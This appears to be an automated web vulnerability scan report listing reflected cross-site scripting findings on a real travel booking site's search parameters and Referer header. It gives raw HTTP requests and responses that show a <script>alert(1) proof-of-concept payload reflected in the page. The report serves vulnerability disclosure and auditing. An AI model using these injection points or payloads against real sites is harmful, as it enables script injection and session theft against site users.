1. Cross-site scripting (reflected)
1.1. http://www.hotels.com/PPCSearch [city parameter]
1.2. http://www.hotels.com/search.do [destination parameter]
1.3. http://www.hotels.com/search.do [destination parameter]
1.4. http://www.hotels.com/search/ajaxsearch.html [dn parameter]
1.5. http://www.hotels.com/search/ajaxsearch.html [Referer HTTP header]
Severity: | High |
Confidence: | Certain |
Host: | http://www.hotels.com |
Path: | /PPCSearch |
GET /PPCSearch?city=Boston%2C Host: www.hotels.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/r Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Language: en-US Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate Expires: Thu, 08 Apr 2010 09:01:02 GMT Expect: Content-Type: text/html;charset=UTF-8 Pragma: no-cache RTSS: 1 Vary: Accept-Encoding Date: Sat, 13 Nov 2010 21:23:17 GMT Connection: close Set-Cookie: SSID=iR53og0cqySo05WYlU0x Set-Cookie: SSSC=7.95052876.111312646 Set-Cookie: SSLB=1; path=/; domain=.hotels.com Set-Cookie: SESSID=597C28CBB9F13 Set-Cookie: guid=744ccac6-9a26-4100 Set-Cookie: hcomPSRC=OT2; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:23:16 GMT; Path=/ Set-Cookie: jsEnabled=false; Domain=.hotels.com; Expires=Sun, 14-Nov-2010 21:23:16 GMT; Path=/ Set-Cookie: mvthistory=""; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:23:16 GMT; Path=/ Set-Cookie: homepage_search_data= Set-Cookie: user=QSplbl9VU3xIQ09NX1VT Content-Length: 106102 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <input type="hidden" name="destinationName" value="Boston, MAee4c2"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hotels.com |
Path: | /search.do |
GET /search.do?searchParams Host: www.hotels.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/r Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSID=C8DF9272F073B |
HTTP/1.1 200 OK Server: Apache Content-Language: en-US Cache-Control: no-cache,no-store,must Expires: Thu, 01 Jan 1970 00:00:00 GMT Expect: Content-Type: text/html;charset=UTF-8 Date: Sat, 13 Nov 2010 21:29:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: hcomPSRC=OT2; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:29:51 GMT; Path=/ Set-Cookie: jsEnabled=false; Domain=.hotels.com; Expires=Sun, 14-Nov-2010 21:29:51 GMT; Path=/ Set-Cookie: homepage_search_data= Set-Cookie: user=QSplbl9VU3xIQ09NX1VT Content-Length: 106030 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="destinationName" value="Boston, MA23e3e"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hotels.com |
Path: | /search.do |
GET /search.do?jsDetect Host: www.hotels.com Proxy-Connection: keep-alive Referer: http://www.hotels.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSID=C8DF9272F073B |
HTTP/1.1 200 OK Server: Apache Content-Language: en-US Cache-Control: no-cache,no-store,must Expires: Thu, 01 Jan 1970 00:00:00 GMT Expect: Content-Type: text/html;charset=UTF-8 Date: Sat, 13 Nov 2010 21:25:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: hcomPSRC=OT2; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:25:36 GMT; Path=/ Set-Cookie: mvthistory=98.6.7%3A65.2 Set-Cookie: homepage_search_data= Set-Cookie: user=QSplbl9VU3xIQ09NX1VT Content-Length: 105659 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="destinationName" value="Boston, MA56e19"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hotels.com |
Path: | /search/ajaxsearch.html |
GET /search/ajaxsearch.html Host: www.hotels.com Proxy-Connection: keep-alive Referer: http://www.hotels.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSID=C8DF9272F073B |
HTTP/1.1 200 OK Server: Apache Content-Language: en-US Cache-Control: no-cache,no-store,must Expires: Thu, 01 Jan 1970 00:00:00 GMT Expect: Content-Type: application/json;charset Date: Sat, 13 Nov 2010 21:26:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: hcomPSRC=OT2; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:26:40 GMT; Path=/ Set-Cookie: mvthistory=98.6.7%3A65.2 Set-Cookie: user=QSplbl9VU3xIQ09NX1VT Content-Length: 241210 {"cookies":{},"searc ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hotels.com |
Path: | /search/ajaxsearch.html |
GET /search/ajaxsearch.html HTTP/1.1 Host: www.hotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: hcomPSRC=OT2; jsEnabled=true; __utmz=105755674 Referer: http://www.google.com |
HTTP/1.1 200 OK Server: Apache Content-Language: en-US Cache-Control: no-cache,no-store,must Expires: Thu, 01 Jan 1970 00:00:00 GMT Expect: Content-Type: application/json;charset Date: Sat, 13 Nov 2010 21:16:31 GMT Content-Length: 25363 Connection: close Set-Cookie: hcomPSRC=OT2; Domain=.hotels.com; Expires=Sun, 13-Nov-2011 21:16:31 GMT; Path=/ Set-Cookie: mvthistory=98.6.7%3A65.2 Set-Cookie: user=QSplbl9VU3xIQ09NX1VT {"cookies":{},"searc ...[SNIP]... alyst":{"channel": ...[SNIP]... |